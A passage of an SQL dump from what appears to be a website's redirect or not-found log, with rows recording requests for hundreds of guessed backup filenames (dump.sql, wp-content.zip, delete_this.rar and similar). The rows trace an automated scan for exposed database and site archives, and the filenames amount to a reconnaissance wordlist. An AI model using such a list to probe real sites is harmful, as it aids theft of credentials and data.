11:20:37','0000-00-00 00:00:00',301),(21886,'https://ekvatorprint.com.ua/dump.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:38','0000-00-00 00:00:00',301),(21887,'https://ekvatorprint.com.ua/dump.bz2',NULL,'','',1,0,'2022-03-23 11:20:38','0000-00-00 00:00:00',301),(21888,'https://ekvatorprint.com.ua/dump.rar',NULL,'','',5,0,'2022-03-23 11:20:38','0000-00-00 00:00:00',301),(21889,'https://ekvatorprint.com.ua/dump.bak',NULL,'','',1,0,'2022-03-23 11:20:38','0000-00-00 00:00:00',301),(21890,'https://ekvatorprint.com.ua/dump.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:39','0000-00-00 00:00:00',301),(21891,'https://ekvatorprint.com.ua/dump.7z',NULL,'','',7,0,'2022-03-23 11:20:40','0000-00-00 00:00:00',301),(21892,'https://ekvatorprint.com.ua/dumps.sql',NULL,'','',1,0,'2022-03-23 11:20:41','0000-00-00 00:00:00',301),(21893,'https://ekvatorprint.com.ua/dumps.tar',NULL,'','',1,0,'2022-03-23 11:20:41','0000-00-00 00:00:00',301),(21894,'https://ekvatorprint.com.ua/dumps.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:42','0000-00-00 00:00:00',301),(21895,'https://ekvatorprint.com.ua/dumps.bz2',NULL,'','',1,0,'2022-03-23 11:20:42','0000-00-00 00:00:00',301),(21896,'https://ekvatorprint.com.ua/dumps.rar',NULL,'','',2,0,'2022-03-23 11:20:42','0000-00-00 00:00:00',301),(21897,'https://ekvatorprint.com.ua/dumps.bak',NULL,'','',1,0,'2022-03-23 11:20:42','0000-00-00 00:00:00',301),(21898,'https://ekvatorprint.com.ua/dumps.zip',NULL,'','',1,0,'2022-03-23 11:20:43','0000-00-00 00:00:00',301),(21899,'https://ekvatorprint.com.ua/dumps.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:43','0000-00-00 00:00:00',301),(21900,'https://ekvatorprint.com.ua/dumps.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:43','0000-00-00 00:00:00',301),(21901,'https://ekvatorprint.com.ua/dumps.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:43','0000-00-00 00:00:00',301),(21902,'https://ekvatorprint.com.ua/dumps.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:44','0000-00-00 00:00:00',301),(21903,'https://ekvatorprint.com.ua/dumps.7z',NULL,'','',1,0,'2022-03-23 11:20:44','0000-00-00 00:00:00',301),(21904,'https://ekvatorprint.com.ua/dumps.gz',NULL,'','',1,0,'2022-03-23 11:20:45','0000-00-00 00:00:00',301),(21905,'https://ekvatorprint.com.ua/system.sql',NULL,'','',1,0,'2022-03-23 11:20:45','0000-00-00 00:00:00',301),(21906,'https://ekvatorprint.com.ua/system.tar',NULL,'','',1,0,'2022-03-23 11:20:45','0000-00-00 00:00:00',301),(21907,'https://ekvatorprint.com.ua/system.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:45','0000-00-00 00:00:00',301),(21908,'https://ekvatorprint.com.ua/system.bz2',NULL,'','',1,0,'2022-03-23 11:20:46','0000-00-00 00:00:00',301),(21909,'https://ekvatorprint.com.ua/system.rar',NULL,'','',2,0,'2022-03-23 11:20:46','0000-00-00 00:00:00',301),(21910,'https://ekvatorprint.com.ua/system.bak',NULL,'','',1,0,'2022-03-23 11:20:46','0000-00-00 00:00:00',301),(21911,'https://ekvatorprint.com.ua/system.zip',NULL,'','',1,0,'2022-03-23 11:20:47','0000-00-00 00:00:00',301),(21912,'https://ekvatorprint.com.ua/system.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:47','0000-00-00 00:00:00',301),(21913,'https://ekvatorprint.com.ua/system.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:47','0000-00-00 00:00:00',301),(21914,'https://ekvatorprint.com.ua/system.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:47','0000-00-00 00:00:00',301),(21915,'https://ekvatorprint.com.ua/system.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:48','0000-00-00 00:00:00',301),(21916,'https://ekvatorprint.com.ua/system.7z',NULL,'','',1,0,'2022-03-23 11:20:48','0000-00-00 00:00:00',301),(21917,'https://ekvatorprint.com.ua/system.gz',NULL,'','',1,0,'2022-03-23 11:20:48','0000-00-00 00:00:00',301),(21918,'https://ekvatorprint.com.ua/blog.sql',NULL,'','',1,0,'2022-03-23 11:20:48','0000-00-00 00:00:00',301),(21919,'https://ekvatorprint.com.ua/blog.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:49','0000-00-00 00:00:00',301),(21920,'https://ekvatorprint.com.ua/blog.bz2',NULL,'','',1,0,'2022-03-23 11:20:49','0000-00-00 00:00:00',301),(21921,'https://ekvatorprint.com.ua/blog.rar',NULL,'','',2,0,'2022-03-23 11:20:49','0000-00-00 00:00:00',301),(21922,'https://ekvatorprint.com.ua/blog.bak',NULL,'','',1,0,'2022-03-23 11:20:50','0000-00-00 00:00:00',301),(21923,'https://ekvatorprint.com.ua/blog.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:50','0000-00-00 00:00:00',301),(21924,'https://ekvatorprint.com.ua/blog.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:50','0000-00-00 00:00:00',301),(21925,'https://ekvatorprint.com.ua/blog.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:51','0000-00-00 00:00:00',301),(21926,'https://ekvatorprint.com.ua/blog.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:51','0000-00-00 00:00:00',301),(21927,'https://ekvatorprint.com.ua/blog.7z',NULL,'','',1,0,'2022-03-23 11:20:52','0000-00-00 00:00:00',301),(21928,'https://ekvatorprint.com.ua/blog.gz',NULL,'','',1,0,'2022-03-23 11:20:52','0000-00-00 00:00:00',301),(21929,'https://ekvatorprint.com.ua/blogs.sql',NULL,'','',1,0,'2022-03-23 11:20:52','0000-00-00 00:00:00',301),(21930,'https://ekvatorprint.com.ua/blogs.tar',NULL,'','',1,0,'2022-03-23 11:20:52','0000-00-00 00:00:00',301),(21931,'https://ekvatorprint.com.ua/blogs.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:53','0000-00-00 00:00:00',301),(21932,'https://ekvatorprint.com.ua/blogs.bz2',NULL,'','',1,0,'2022-03-23 11:20:53','0000-00-00 00:00:00',301),(21933,'https://ekvatorprint.com.ua/blogs.rar',NULL,'','',2,0,'2022-03-23 11:20:53','0000-00-00 00:00:00',301),(21934,'https://ekvatorprint.com.ua/blogs.bak',NULL,'','',1,0,'2022-03-23 11:20:53','0000-00-00 00:00:00',301),(21935,'https://ekvatorprint.com.ua/blogs.zip',NULL,'','',1,0,'2022-03-23 11:20:54','0000-00-00 00:00:00',301),(21936,'https://ekvatorprint.com.ua/blogs.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:54','0000-00-00 00:00:00',301),(21937,'https://ekvatorprint.com.ua/blogs.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:54','0000-00-00 00:00:00',301),(21938,'https://ekvatorprint.com.ua/blogs.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:54','0000-00-00 00:00:00',301),(21939,'https://ekvatorprint.com.ua/blogs.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:55','0000-00-00 00:00:00',301),(21940,'https://ekvatorprint.com.ua/blogs.7z',NULL,'','',1,0,'2022-03-23 11:20:55','0000-00-00 00:00:00',301),(21941,'https://ekvatorprint.com.ua/blogs.gz',NULL,'','',1,0,'2022-03-23 11:20:55','0000-00-00 00:00:00',301),(21942,'https://ekvatorprint.com.ua/temp.sql',NULL,'','',1,0,'2022-03-23 11:20:55','0000-00-00 00:00:00',301),(21943,'https://ekvatorprint.com.ua/temp.tar',NULL,'','',1,0,'2022-03-23 11:20:56','0000-00-00 00:00:00',301),(21944,'https://ekvatorprint.com.ua/temp.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:56','0000-00-00 00:00:00',301),(21945,'https://ekvatorprint.com.ua/temp.bz2',NULL,'','',1,0,'2022-03-23 11:20:56','0000-00-00 00:00:00',301),(21946,'https://ekvatorprint.com.ua/temp.rar',NULL,'','',2,0,'2022-03-23 11:20:56','0000-00-00 00:00:00',301),(21947,'https://ekvatorprint.com.ua/temp.bak',NULL,'','',1,0,'2022-03-23 11:20:57','0000-00-00 00:00:00',301),(21948,'https://ekvatorprint.com.ua/temp.zip',NULL,'','',1,0,'2022-03-23 11:20:57','0000-00-00 00:00:00',301),(21949,'https://ekvatorprint.com.ua/temp.sql.gz',NULL,'','',1,0,'2022-03-23 11:20:57','0000-00-00 00:00:00',301),(21950,'https://ekvatorprint.com.ua/temp.sql.zip',NULL,'','',1,0,'2022-03-23 11:20:57','0000-00-00 00:00:00',301),(21951,'https://ekvatorprint.com.ua/temp.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:58','0000-00-00 00:00:00',301),(21952,'https://ekvatorprint.com.ua/temp.sql.tar',NULL,'','',1,0,'2022-03-23 11:20:58','0000-00-00 00:00:00',301),(21953,'https://ekvatorprint.com.ua/temp.7z',NULL,'','',1,0,'2022-03-23 11:20:58','0000-00-00 00:00:00',301),(21954,'https://ekvatorprint.com.ua/temp.gz',NULL,'','',1,0,'2022-03-23 11:20:59','0000-00-00 00:00:00',301),(21955,'https://ekvatorprint.com.ua/delete.sql',NULL,'','',1,0,'2022-03-23 11:20:59','0000-00-00 00:00:00',301),(21956,'https://ekvatorprint.com.ua/delete.tar',NULL,'','',1,0,'2022-03-23 11:20:59','0000-00-00 00:00:00',301),(21957,'https://ekvatorprint.com.ua/delete.tar.gz',NULL,'','',1,0,'2022-03-23 11:20:59','0000-00-00 00:00:00',301),(21958,'https://ekvatorprint.com.ua/delete.bz2',NULL,'','',1,0,'2022-03-23 11:21:00','0000-00-00 00:00:00',301),(21959,'https://ekvatorprint.com.ua/delete.rar',NULL,'','',2,0,'2022-03-23 11:21:00','0000-00-00 00:00:00',301),(21960,'https://ekvatorprint.com.ua/delete.bak',NULL,'','',1,0,'2022-03-23 11:21:00','0000-00-00 00:00:00',301),(21961,'https://ekvatorprint.com.ua/delete.zip',NULL,'','',1,0,'2022-03-23 11:21:00','0000-00-00 00:00:00',301),(21962,'https://ekvatorprint.com.ua/delete.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:01','0000-00-00 00:00:00',301),(21963,'https://ekvatorprint.com.ua/delete.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:01','0000-00-00 00:00:00',301),(21964,'https://ekvatorprint.com.ua/delete.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:01','0000-00-00 00:00:00',301),(21965,'https://ekvatorprint.com.ua/delete.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:02','0000-00-00 00:00:00',301),(21966,'https://ekvatorprint.com.ua/delete.7z',NULL,'','',1,0,'2022-03-23 11:21:02','0000-00-00 00:00:00',301),(21967,'https://ekvatorprint.com.ua/delete.gz',NULL,'','',1,0,'2022-03-23 11:21:02','0000-00-00 00:00:00',301),(21968,'https://ekvatorprint.com.ua/delete_this.sql',NULL,'','',1,0,'2022-03-23 11:21:03','0000-00-00 00:00:00',301),(21969,'https://ekvatorprint.com.ua/delete_this.tar',NULL,'','',1,0,'2022-03-23 11:21:03','0000-00-00 00:00:00',301),(21970,'https://ekvatorprint.com.ua/delete_this.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:03','0000-00-00 00:00:00',301),(21971,'https://ekvatorprint.com.ua/delete_this.bz2',NULL,'','',1,0,'2022-03-23 11:21:03','0000-00-00 00:00:00',301),(21972,'https://ekvatorprint.com.ua/delete_this.rar',NULL,'','',2,0,'2022-03-23 11:21:04','0000-00-00 00:00:00',301),(21973,'https://ekvatorprint.com.ua/delete_this.bak',NULL,'','',1,0,'2022-03-23 11:21:04','0000-00-00 00:00:00',301),(21974,'https://ekvatorprint.com.ua/delete_this.zip',NULL,'','',1,0,'2022-03-23 11:21:04','0000-00-00 00:00:00',301),(21975,'https://ekvatorprint.com.ua/delete_this.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:04','0000-00-00 00:00:00',301),(21976,'https://ekvatorprint.com.ua/delete_this.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:05','0000-00-00 00:00:00',301),(21977,'https://ekvatorprint.com.ua/delete_this.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:05','0000-00-00 00:00:00',301),(21978,'https://ekvatorprint.com.ua/delete_this.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:05','0000-00-00 00:00:00',301),(21979,'https://ekvatorprint.com.ua/delete_this.7z',NULL,'','',1,0,'2022-03-23 11:21:05','0000-00-00 00:00:00',301),(21980,'https://ekvatorprint.com.ua/delete_this.gz',NULL,'','',1,0,'2022-03-23 11:21:06','0000-00-00 00:00:00',301),(21981,'https://ekvatorprint.com.ua/new_site.sql',NULL,'','',1,0,'2022-03-23 11:21:06','0000-00-00 00:00:00',301),(21982,'https://ekvatorprint.com.ua/new_site.tar',NULL,'','',1,0,'2022-03-23 11:21:07','0000-00-00 00:00:00',301),(21983,'https://ekvatorprint.com.ua/new_site.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:07','0000-00-00 00:00:00',301),(21984,'https://ekvatorprint.com.ua/new_site.bz2',NULL,'','',1,0,'2022-03-23 11:21:07','0000-00-00 00:00:00',301),(21985,'https://ekvatorprint.com.ua/new_site.rar',NULL,'','',2,0,'2022-03-23 11:21:07','0000-00-00 00:00:00',301),(21986,'https://ekvatorprint.com.ua/new_site.bak',NULL,'','',1,0,'2022-03-23 11:21:08','0000-00-00 00:00:00',301),(21987,'https://ekvatorprint.com.ua/new_site.zip',NULL,'','',1,0,'2022-03-23 11:21:08','0000-00-00 00:00:00',301),(21988,'https://ekvatorprint.com.ua/new_site.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:08','0000-00-00 00:00:00',301),(21989,'https://ekvatorprint.com.ua/new_site.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:08','0000-00-00 00:00:00',301),(21990,'https://ekvatorprint.com.ua/new_site.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:09','0000-00-00 00:00:00',301),(21991,'https://ekvatorprint.com.ua/new_site.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:09','0000-00-00 00:00:00',301),(21992,'https://ekvatorprint.com.ua/new_site.7z',NULL,'','',1,0,'2022-03-23 11:21:10','0000-00-00 00:00:00',301),(21993,'https://ekvatorprint.com.ua/new_site.gz',NULL,'','',1,0,'2022-03-23 11:21:10','0000-00-00 00:00:00',301),(21994,'https://ekvatorprint.com.ua/site_new.sql',NULL,'','',1,0,'2022-03-23 11:21:10','0000-00-00 00:00:00',301),(21995,'https://ekvatorprint.com.ua/site_new.tar',NULL,'','',1,0,'2022-03-23 11:21:10','0000-00-00 00:00:00',301),(21996,'https://ekvatorprint.com.ua/site_new.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:11','0000-00-00 00:00:00',301),(21997,'https://ekvatorprint.com.ua/site_new.bz2',NULL,'','',1,0,'2022-03-23 11:21:11','0000-00-00 00:00:00',301),(21998,'https://ekvatorprint.com.ua/site_new.rar',NULL,'','',2,0,'2022-03-23 11:21:11','0000-00-00 00:00:00',301),(21999,'https://ekvatorprint.com.ua/site_new.bak',NULL,'','',1,0,'2022-03-23 11:21:11','0000-00-00 00:00:00',301),(22000,'https://ekvatorprint.com.ua/site_new.zip',NULL,'','',1,0,'2022-03-23 11:21:12','0000-00-00 00:00:00',301),(22001,'https://ekvatorprint.com.ua/site_new.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:12','0000-00-00 00:00:00',301),(22002,'https://ekvatorprint.com.ua/site_new.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:12','0000-00-00 00:00:00',301),(22003,'https://ekvatorprint.com.ua/site_new.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:12','0000-00-00 00:00:00',301),(22004,'https://ekvatorprint.com.ua/site_new.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:13','0000-00-00 00:00:00',301),(22005,'https://ekvatorprint.com.ua/site_new.7z',NULL,'','',1,0,'2022-03-23 11:21:13','0000-00-00 00:00:00',301),(22006,'https://ekvatorprint.com.ua/site_new.gz',NULL,'','',1,0,'2022-03-23 11:21:13','0000-00-00 00:00:00',301),(22007,'https://ekvatorprint.com.ua/store.sql',NULL,'','',1,0,'2022-03-23 11:21:14','0000-00-00 00:00:00',301),(22008,'https://ekvatorprint.com.ua/store.tar',NULL,'','',1,0,'2022-03-23 11:21:14','0000-00-00 00:00:00',301),(22009,'https://ekvatorprint.com.ua/store.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:14','0000-00-00 00:00:00',301),(22010,'https://ekvatorprint.com.ua/store.bz2',NULL,'','',1,0,'2022-03-23 11:21:14','0000-00-00 00:00:00',301),(22011,'https://ekvatorprint.com.ua/store.rar',NULL,'','',2,0,'2022-03-23 11:21:15','0000-00-00 00:00:00',301),(22012,'https://ekvatorprint.com.ua/store.bak',NULL,'','',1,0,'2022-03-23 11:21:15','0000-00-00 00:00:00',301),(22013,'https://ekvatorprint.com.ua/store.zip',NULL,'','',1,0,'2022-03-23 11:21:15','0000-00-00 00:00:00',301),(22014,'https://ekvatorprint.com.ua/store.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:15','0000-00-00 00:00:00',301),(22015,'https://ekvatorprint.com.ua/store.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:15','0000-00-00 00:00:00',301),(22016,'https://ekvatorprint.com.ua/store.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:16','0000-00-00 00:00:00',301),(22017,'https://ekvatorprint.com.ua/store.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:16','0000-00-00 00:00:00',301),(22018,'https://ekvatorprint.com.ua/store.7z',NULL,'','',1,0,'2022-03-23 11:21:16','0000-00-00 00:00:00',301),(22019,'https://ekvatorprint.com.ua/store.gz',NULL,'','',1,0,'2022-03-23 11:21:17','0000-00-00 00:00:00',301),(22020,'https://ekvatorprint.com.ua/wp-content.sql',NULL,'','',1,0,'2022-03-23 11:21:17','0000-00-00 00:00:00',301),(22021,'https://ekvatorprint.com.ua/wp-content.tar',NULL,'','',1,0,'2022-03-23 11:21:17','0000-00-00 00:00:00',301),(22022,'https://ekvatorprint.com.ua/wp-content.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:17','0000-00-00 00:00:00',301),(22023,'https://ekvatorprint.com.ua/wp-content.bz2',NULL,'','',1,0,'2022-03-23 11:21:18','0000-00-00 00:00:00',301),(22024,'https://ekvatorprint.com.ua/wp-content.rar',NULL,'','',2,0,'2022-03-23 11:21:18','0000-00-00 00:00:00',301),(22025,'https://ekvatorprint.com.ua/wp-content.bak',NULL,'','',1,0,'2022-03-23 11:21:18','0000-00-00 00:00:00',301),(22026,'https://ekvatorprint.com.ua/wp-content.zip',NULL,'','',1,0,'2022-03-23 11:21:18','0000-00-00 00:00:00',301),(22027,'https://ekvatorprint.com.ua/wp-content.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:19','0000-00-00 00:00:00',301),(22028,'https://ekvatorprint.com.ua/wp-content.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:19','0000-00-00 00:00:00',301),(22029,'https://ekvatorprint.com.ua/wp-content.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:19','0000-00-00 00:00:00',301),(22030,'https://ekvatorprint.com.ua/wp-content.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:19','0000-00-00 00:00:00',301),(22031,'https://ekvatorprint.com.ua/wp-content.7z',NULL,'','',1,0,'2022-03-23 11:21:20','0000-00-00 00:00:00',301),(22032,'https://ekvatorprint.com.ua/wp-content.gz',NULL,'','',1,0,'2022-03-23 11:21:20','0000-00-00 00:00:00',301),(22033,'https://ekvatorprint.com.ua/e.sql',NULL,'','',2,0,'2022-03-23 11:21:20','0000-00-00 00:00:00',301),(22034,'https://ekvatorprint.com.ua/e.tar',NULL,'','',2,0,'2022-03-23 11:21:21','0000-00-00 00:00:00',301),(22035,'https://ekvatorprint.com.ua/e.tar.gz',NULL,'','',2,0,'2022-03-23 11:21:21','0000-00-00 00:00:00',301),(22036,'https://ekvatorprint.com.ua/e.bz2',NULL,'','',2,0,'2022-03-23 11:21:21','0000-00-00 00:00:00',301),(22037,'https://ekvatorprint.com.ua/e.rar',NULL,'','',4,0,'2022-03-23 11:21:21','0000-00-00 00:00:00',301),(22038,'https://ekvatorprint.com.ua/e.bak',NULL,'','',2,0,'2022-03-23 11:21:22','0000-00-00 00:00:00',301),(22039,'https://ekvatorprint.com.ua/e.zip',NULL,'','',2,0,'2022-03-23 11:21:22','0000-00-00 00:00:00',301),(22040,'https://ekvatorprint.com.ua/e.sql.gz',NULL,'','',2,0,'2022-03-23 11:21:22','0000-00-00 00:00:00',301),(22041,'https://ekvatorprint.com.ua/e.sql.zip',NULL,'','',2,0,'2022-03-23 11:21:22','0000-00-00 00:00:00',301),(22042,'https://ekvatorprint.com.ua/e.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:21:23','0000-00-00 00:00:00',301),(22043,'https://ekvatorprint.com.ua/e.sql.tar',NULL,'','',2,0,'2022-03-23 11:21:23','0000-00-00 00:00:00',301),(22044,'https://ekvatorprint.com.ua/e.7z',NULL,'','',2,0,'2022-03-23 11:21:23','0000-00-00 00:00:00',301),(22045,'https://ekvatorprint.com.ua/e.gz',NULL,'','',2,0,'2022-03-23 11:21:24','0000-00-00 00:00:00',301),(22046,'https://ekvatorprint.com.ua/ek.sql',NULL,'','',1,0,'2022-03-23 11:21:24','0000-00-00 00:00:00',301),(22047,'https://ekvatorprint.com.ua/ek.tar',NULL,'','',1,0,'2022-03-23 11:21:24','0000-00-00 00:00:00',301),(22048,'https://ekvatorprint.com.ua/ek.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:24','0000-00-00 00:00:00',301),(22049,'https://ekvatorprint.com.ua/ek.bz2',NULL,'','',1,0,'2022-03-23 11:21:25','0000-00-00 00:00:00',301),(22050,'https://ekvatorprint.com.ua/ek.rar',NULL,'','',2,0,'2022-03-23 11:21:25','0000-00-00 00:00:00',301),(22051,'https://ekvatorprint.com.ua/ek.bak',NULL,'','',1,0,'2022-03-23 11:21:25','0000-00-00 00:00:00',301),(22052,'https://ekvatorprint.com.ua/ek.zip',NULL,'','',1,0,'2022-03-23 11:21:25','0000-00-00 00:00:00',301),(22053,'https://ekvatorprint.com.ua/ek.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:26','0000-00-00 00:00:00',301),(22054,'https://ekvatorprint.com.ua/ek.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:26','0000-00-00 00:00:00',301),(22055,'https://ekvatorprint.com.ua/ek.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:26','0000-00-00 00:00:00',301),(22056,'https://ekvatorprint.com.ua/ek.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:26','0000-00-00 00:00:00',301),(22057,'https://ekvatorprint.com.ua/ek.7z',NULL,'','',1,0,'2022-03-23 11:21:27','0000-00-00 00:00:00',301),(22058,'https://ekvatorprint.com.ua/ek.gz',NULL,'','',1,0,'2022-03-23 11:21:27','0000-00-00 00:00:00',301),(22059,'https://ekvatorprint.com.ua/ekv.sql',NULL,'','',1,0,'2022-03-23 11:21:27','0000-00-00 00:00:00',301),(22060,'https://ekvatorprint.com.ua/ekv.tar',NULL,'','',1,0,'2022-03-23 11:21:27','0000-00-00 00:00:00',301),(22061,'https://ekvatorprint.com.ua/ekv.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:28','0000-00-00 00:00:00',301),(22062,'https://ekvatorprint.com.ua/ekv.bz2',NULL,'','',1,0,'2022-03-23 11:21:28','0000-00-00 00:00:00',301),(22063,'https://ekvatorprint.com.ua/ekv.rar',NULL,'','',2,0,'2022-03-23 11:21:28','0000-00-00 00:00:00',301),(22064,'https://ekvatorprint.com.ua/ekv.bak',NULL,'','',1,0,'2022-03-23 11:21:28','0000-00-00 00:00:00',301),(22065,'https://ekvatorprint.com.ua/ekv.zip',NULL,'','',1,0,'2022-03-23 11:21:29','0000-00-00 00:00:00',301),(22066,'https://ekvatorprint.com.ua/ekv.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:29','0000-00-00 00:00:00',301),(22067,'https://ekvatorprint.com.ua/ekv.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:29','0000-00-00 00:00:00',301),(22068,'https://ekvatorprint.com.ua/ekv.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:29','0000-00-00 00:00:00',301),(22069,'https://ekvatorprint.com.ua/ekv.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:30','0000-00-00 00:00:00',301),(22070,'https://ekvatorprint.com.ua/ekv.7z',NULL,'','',1,0,'2022-03-23 11:21:30','0000-00-00 00:00:00',301),(22071,'https://ekvatorprint.com.ua/ekv.gz',NULL,'','',1,0,'2022-03-23 11:21:30','0000-00-00 00:00:00',301),(22072,'https://ekvatorprint.com.ua/ekva.sql',NULL,'','',1,0,'2022-03-23 11:21:31','0000-00-00 00:00:00',301),(22073,'https://ekvatorprint.com.ua/ekva.tar',NULL,'','',1,0,'2022-03-23 11:21:31','0000-00-00 00:00:00',301),(22074,'https://ekvatorprint.com.ua/ekva.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:32','0000-00-00 00:00:00',301),(22075,'https://ekvatorprint.com.ua/ekva.bz2',NULL,'','',1,0,'2022-03-23 11:21:32','0000-00-00 00:00:00',301),(22076,'https://ekvatorprint.com.ua/ekva.rar',NULL,'','',2,0,'2022-03-23 11:21:32','0000-00-00 00:00:00',301),(22077,'https://ekvatorprint.com.ua/ekva.bak',NULL,'','',1,0,'2022-03-23 11:21:32','0000-00-00 00:00:00',301),(22078,'https://ekvatorprint.com.ua/ekva.zip',NULL,'','',1,0,'2022-03-23 11:21:33','0000-00-00 00:00:00',301),(22079,'https://ekvatorprint.com.ua/ekva.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:33','0000-00-00 00:00:00',301),(22080,'https://ekvatorprint.com.ua/ekva.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:33','0000-00-00 00:00:00',301),(22081,'https://ekvatorprint.com.ua/ekva.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:33','0000-00-00 00:00:00',301),(22082,'https://ekvatorprint.com.ua/ekva.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:34','0000-00-00 00:00:00',301),(22083,'https://ekvatorprint.com.ua/ekva.7z',NULL,'','',1,0,'2022-03-23 11:21:34','0000-00-00 00:00:00',301),(22084,'https://ekvatorprint.com.ua/ekva.gz',NULL,'','',1,0,'2022-03-23 11:21:34','0000-00-00 00:00:00',301),(22085,'https://ekvatorprint.com.ua/ekvat.sql',NULL,'','',1,0,'2022-03-23 11:21:35','0000-00-00 00:00:00',301),(22086,'https://ekvatorprint.com.ua/ekvat.tar',NULL,'','',1,0,'2022-03-23 11:21:35','0000-00-00 00:00:00',301),(22087,'https://ekvatorprint.com.ua/ekvat.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:35','0000-00-00 00:00:00',301),(22088,'https://ekvatorprint.com.ua/ekvat.bz2',NULL,'','',1,0,'2022-03-23 11:21:35','0000-00-00 00:00:00',301),(22089,'https://ekvatorprint.com.ua/ekvat.rar',NULL,'','',2,0,'2022-03-23 11:21:36','0000-00-00 00:00:00',301),(22090,'https://ekvatorprint.com.ua/ekvat.bak',NULL,'','',1,0,'2022-03-23 11:21:36','0000-00-00 00:00:00',301),(22091,'https://ekvatorprint.com.ua/ekvat.zip',NULL,'','',1,0,'2022-03-23 11:21:36','0000-00-00 00:00:00',301),(22092,'https://ekvatorprint.com.ua/ekvat.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:36','0000-00-00 00:00:00',301),(22093,'https://ekvatorprint.com.ua/ekvat.sql.zip',NULL,'','',1,0,'2022-03-23 11:21:37','0000-00-00 00:00:00',301),(22094,'https://ekvatorprint.com.ua/ekvat.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:37','0000-00-00 00:00:00',301),(22095,'https://ekvatorprint.com.ua/ekvat.sql.tar',NULL,'','',1,0,'2022-03-23 11:21:37','0000-00-00 00:00:00',301),(22096,'https://ekvatorprint.com.ua/ekvat.7z',NULL,'','',1,0,'2022-03-23 11:21:38','0000-00-00 00:00:00',301),(22097,'https://ekvatorprint.com.ua/ekvat.gz',NULL,'','',1,0,'2022-03-23 11:21:38','0000-00-00 00:00:00',301),(22098,'https://ekvatorprint.com.ua/ekvato.sql',NULL,'','',1,0,'2022-03-23 11:21:38','0000-00-00 00:00:00',301),(22099,'https://ekvatorprint.com.ua/ekvato.tar',NULL,'','',1,0,'2022-03-23 11:21:38','0000-00-00 00:00:00',301),(22100,'https://ekvatorprint.com.ua/ekvato.tar.gz',NULL,'','',1,0,'2022-03-23 11:21:39','0000-00-00 00:00:00',301),(22101,'https://ekvatorprint.com.ua/ekvato.bz2',NULL,'','',1,0,'2022-03-23 11:21:39','0000-00-00 00:00:00',301),(22102,'https://ekvatorprint.com.ua/ekvato.rar',NULL,'','',2,0,'2022-03-23 11:21:39','0000-00-00 00:00:00',301),(22103,'https://ekvatorprint.com.ua/ekvato.bak',NULL,'','',1,0,'2022-03-23 11:21:39','0000-00-00 00:00:00',301),(22104,'https://ekvatorprint.com.ua/ekvato.zip',NULL,'','',1,0,'2022-03-23 11:21:40','0000-00-00 00:00:00',301),(22105,'https://ekvatorprint.com.ua/ekvato.sql.gz',NULL,'','',1,0,'2022-03-23 11:21:40','0000-00-00 